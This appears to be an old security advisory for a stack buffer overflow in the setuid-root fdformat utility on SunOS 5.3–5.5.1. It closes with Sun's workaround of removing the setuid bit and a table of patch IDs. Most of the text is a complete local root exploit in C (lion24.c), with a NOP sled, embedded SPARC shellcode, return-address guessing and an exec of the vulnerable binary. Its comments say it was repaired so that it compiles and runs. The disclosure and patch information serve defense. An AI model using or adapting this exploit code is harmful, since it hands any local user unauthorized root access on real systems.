COMMAND

    /bin/fdformat

SYSTEMS AFFECTED

    SunOS versions 5.3, 5.4, 5.5, 5.5_x86, 5.5.1, and 5.5.1_x86 are
    vulnerable (the patch table under SOLUTION also lists a fix for
    5.4_x86, so treat that release as affected too).

PROBLEM

    fdformat(1) is a utility for formatting both diskettes and  PCMCIA
    memory cards.  Due to  insufficient bounds  checking on  arguments
    which  are  supplied  by  users,  it  is possible to overwrite the
    internal  stack  space  of  the  fdformat  program  while  it   is
    executing.   By  supplying  a  carefully  designed argument to the
    fdformat  program,  intruders  may  be  able  to force fdformat to
    execute arbitrary commands.  As fdformat is setuid root, this  may
    allow intruders to run arbitrary commands with root privileges.

    The buffer overflow in find_media() reported by Cristian Schipor is
    also present in /bin/fdformat (the flaw lives in the volume management
    library that fdformat uses; see SOLUTION).  While fdformat is installed
    setuid, any local user can exploit it to obtain a shell running as root
    (or as whatever user owns the fdformat binary).  Once again, Cristian
    wrote the exploit.

    His exploit follows.  An optional argv[1] adjusts the guessed address by
    a further signed offset (it is subtracted from the computed address, so
    try +-x with x = 8*k, k = 1, 2, 3, ...) when the built-in STACK_OFFSET
    does not land in the NOP sled:

    ------------------------- lion24.c -------------------------------

    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* Number of bytes occupied by the NOP sled plus the shellcode before the
     * address copies start (see main()). */
    #define BUF_LENGTH 264
    /* Number of bytes of guessed-address copies appended after the shellcode. */
    #define EXTRA 36
    /* Subtracted from this process's own stack pointer (get_sp()) to form the
     * address written into the EXTRA region; -56 therefore moves the guess
     * 56 bytes up the stack.  argv[1] applies a further adjustment. */
    #define STACK_OFFSET -56
    /* Filler word for the NOP sled.  None of its four bytes is 0x00 --
     * presumably chosen so the argv string is not cut short. */
    #define SPARC_NOP 0xa61cc013

    /* SPARC shellcode, 68 bytes, taken verbatim from the original posting.
     * Opaque machine code; not decoded or verified here. */
    u_char sparc_shellcode[] =

    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08"
    ;

    /*
     * Return the current stack pointer.  There is no C return statement: the
     * inline asm copies %sp into %i0, and the caller receives that value only
     * through the SPARC calling convention (presumably %i0 is the callee's
     * return register here -- verify).  SPARC-only; this will not assemble on
     * other architectures, and the function is formally UB in C.
     */
    u_long get_sp(void)
    {
    __asm__("mov %sp,%i0 \n");
    }

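    /*
     * Build the overlong argument and exec the setuid target with it.
     *
     * Layout of buf, in order:
     *   [NOP sled of SPARC_NOP words][sparc_shellcode][EXTRA bytes of the
     *    guessed address, one copy per sizeof(u_long)][NUL terminator]
     * The guessed address is this process's own stack pointer (get_sp())
     * minus STACK_OFFSET, minus an optional signed adjustment from argv[1].
     *
     * argv[1] (optional): decimal adjustment subtracted from the guessed
     *   address; non-numeric or out-of-range input is rejected.
     * Returns 1 on bad input or if execl() fails; on success the process
     *   image is replaced and main() never returns.
     */
    int main(int argc, char *argv[])
    {
        char buf[BUF_LENGTH + EXTRA + 8];
        long targ_addr;
        long dso = 0;
        size_t code_length = strlen((const char *)sparc_shellcode);
        size_t nops = (BUF_LENGTH - code_length) / sizeof(u_long);
        size_t n_addr = EXTRA / sizeof(u_long);
        size_t pos = 0;
        size_t i;

        if (argc > 1) {
            char *end;
            errno = 0;
            dso = strtol(argv[1], &end, 10);
            if (end == argv[1] || *end != '\0' || errno == ERANGE) {
                fprintf(stderr, "bad offset argument: %s\n", argv[1]);
                return 1;
            }
        }

        targ_addr = get_sp() - STACK_OFFSET - dso;

        /* NOP sled.  memcpy avoids writing u_long through a char buffer
         * whose alignment is not guaranteed. */
        for (i = 0; i < nops; i++) {
            u_long nop = SPARC_NOP;
            memcpy(buf + pos, &nop, sizeof nop);
            pos += sizeof nop;
        }

        /* Shellcode directly after the sled.  (The original loop read
         * `i  code_length`; the `<` had been lost and it did not compile.) */
        memcpy(buf + pos, sparc_shellcode, code_length);
        pos += code_length;

        /* EXTRA bytes of the guessed address, one copy per word. */
        for (i = 0; i < n_addr; i++) {
            memcpy(buf + pos, &targ_addr, sizeof targ_addr);
            pos += sizeof targ_addr;
        }

        /* execl() takes buf as a C string, so it must be NUL-terminated; the
         * original left the trailing slack bytes uninitialised.  pos is at
         * most BUF_LENGTH + EXTRA, so this stays inside the 8 spare bytes. */
        buf[pos] = '\0';

        printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
               targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);

        /* argv[0] carries trailing spaces -- presumably part of the stack
         * layout tuning for the target, so it is kept verbatim. */
        execl("/bin/fdformat", "fdformat   ", &buf[0], (char *)0);
        perror("execl failed");
        return 1;
    }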
    -------------------------- end of lion24.c -----------------------

SOLUTION

    Sun recommends, as a workaround, that the setuid bit be removed from
    both the eject and fdformat programs (on Solaris /bin is normally a
    link to /usr/bin, so /usr/bin/fdformat is the same binary as the
    /bin/fdformat named above) with commands such as the following.  After
    this change ordinary users will likely no longer be able to format
    media with fdformat; verify with ls -l that no 's' remains in the mode:

        chmod 555 /usr/bin/fdformat
        chmod 555 /usr/bin/eject

    The same vulnerabilities are fixed in the upcoming Solaris 2.6 release.
    For the releases listed below, the fdformat-related vulnerabilities in
    the volume management library are fixed by the following patches; apply
    the one matching your exact OS release and architecture (the -NN suffix
    is the patch revision, and a later revision of the same patch normally
    also contains the fix):

        OS version              Patch ID
        ----------              --------
        SunOS 5.5.1             104776-01
        SunOS 5.5.1_x86         104777-01
        SunOS 5.5               103024-02
        SunOS 5.5_x86           103044-02
        SunOS 5.4               101907-14
        SunOS 5.4_x86           101908-14
        SunOS 5.3               101331-07